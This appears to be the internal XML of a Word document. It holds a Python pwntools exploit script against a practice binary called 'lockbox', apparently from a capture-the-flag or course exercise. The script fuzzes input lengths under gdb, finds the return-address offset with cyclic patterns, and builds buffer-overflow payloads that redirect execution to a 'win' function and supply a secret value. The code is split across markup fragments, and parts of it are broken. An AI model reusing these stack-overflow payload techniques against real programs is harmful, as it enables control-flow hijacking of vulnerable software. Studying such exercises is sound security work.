            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>re.search</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("rip", d):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="254D0AB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  <w:t>break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17A1645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recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2592AD6E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>print("return")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0714104F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>return 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27C254C8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653B4B5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 A function to increase the payload size until the data overwrites important values</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC5CB1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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750C97E0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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F2B75D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def </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>fuzz(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4155AB7A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p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EA03B78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lastRenderedPageBreak/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'gdb ./lockbox -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34161D6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>data = 'A' * 16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F728B60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>n = 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7859B9F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>#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.sendline</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("break *0x000000000040127e")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25411021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"break *0x00000000004012a4")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C148726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>while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A918962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  <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"############################")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C504081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  <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"# Now with " + str(n + 16) + " As           #")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC76EC7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  <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"############################")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F1A0EF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"r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EB7C618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recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("&gt;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B375552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  <w:t>payload = data + 'A' * n + "\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64D0F30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</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F07E48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  <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.interactive</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CD7D7F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recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("Breakpoint ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F857B18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  <w:t xml:space="preserve">d = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ED0296C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  <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"Breakpoint " + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(d))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42D20F0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rintStack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p, 20)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F97E7C0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  <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getInfoRegs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51A2608E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  <w:t>n += 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D5EFD1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"c")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="201FCBC6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recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED926C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  <w:t>if n == 23:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BB23EF7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  <w:t>break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514CEA28" w14:textId="2A20E6C3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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EBFE696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 Builds a payload that will get us past the segfault</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72FDCB1A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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D6590A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Output: Payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C6AC883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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>keyPld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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="779AF066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base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1) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,16)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E057CB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key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5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>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="038DE4C7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pad0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00) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,4)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="758E6288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return base + key + </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pad0</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7266FD1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7408DED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 A function to increase the payload size until the data overwrites important values</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13596C1F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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68959389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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D49EA67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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>testPld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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27B2400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base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1) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,16)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C4EC80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data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5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>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755D5217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d2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00) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,4)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1823458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d3 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cyclic(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>500)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C2FFC2E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return base + data + d2 + </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>d3</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="77EA2EE6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6E16249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62878D00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 Builds a payload that will force the program to jump to win when main returns</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05391D7C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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B2CC169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Output: Payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F04CF27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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>winPld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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="768C0EAA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base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1) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,16)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="761B8791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key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5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>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="192CB09A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lastRenderedPageBreak/>
              <w:tab/>
              <w:t xml:space="preserve">pad0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00) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,4)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="627FBF36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pad48 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cyclic(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>48)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59D76E7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win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b6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11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>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B5514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return base + key + pad0 + pad48 + win + </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pad0</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1EFCC5C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623D003E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593F4242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 A function to build the payload to get the secret correct</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ADDC1D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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5862CD4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Output: String containing payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61699A52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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>secretPld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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B5215D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pad16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1) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,16)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="071D32C7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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>keyAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">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5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>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0631A2F6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pad0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00) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,4)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3945605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secret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dd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b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dd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>("B", 0xda)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="358E443F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pad44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2) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,44)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DDCFFC7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win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[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b6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11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 xml:space="preserve">("B", 0x40), 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>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="124D356F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return pad16 + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>keyAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + pad0 + secret + pad44 + win + </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pad0</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3707A962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3BF9E812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7D48E1B6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 A function to find what part of the payload is being read as an address when main returns</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="700807E3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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F238A92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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1187EDAA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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ripOffset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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B5588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>p = process(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>'./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lockbox')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16119DE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d = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("&gt;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CE3EB4E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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>testPld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EC6EC40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wait</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00620FB9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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.corefile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4D01CFB9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stack = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cf.rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="598AC9C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gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>info(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = %#x", stack)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C6C53F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pattern = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cf.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(stack, 4)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22DD7E00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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ripOffset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cyclic_find</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(pattern)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26378EF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gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>info(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"rip offset = %d", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ripOffset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C7509E0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7108B648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7645D52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# A function to find what part of the payload is leaking into </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="70100446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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3180E50C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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38DFBB53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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eaxOffset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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A22414E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p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F304B98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'gdb ./lockbox -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AD0BC3E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"break *0x00000000004011ce")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D26EF0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"r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F6D3EA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d = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("&gt;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="332C92F9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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>winPld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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500F2190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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F87799C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recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
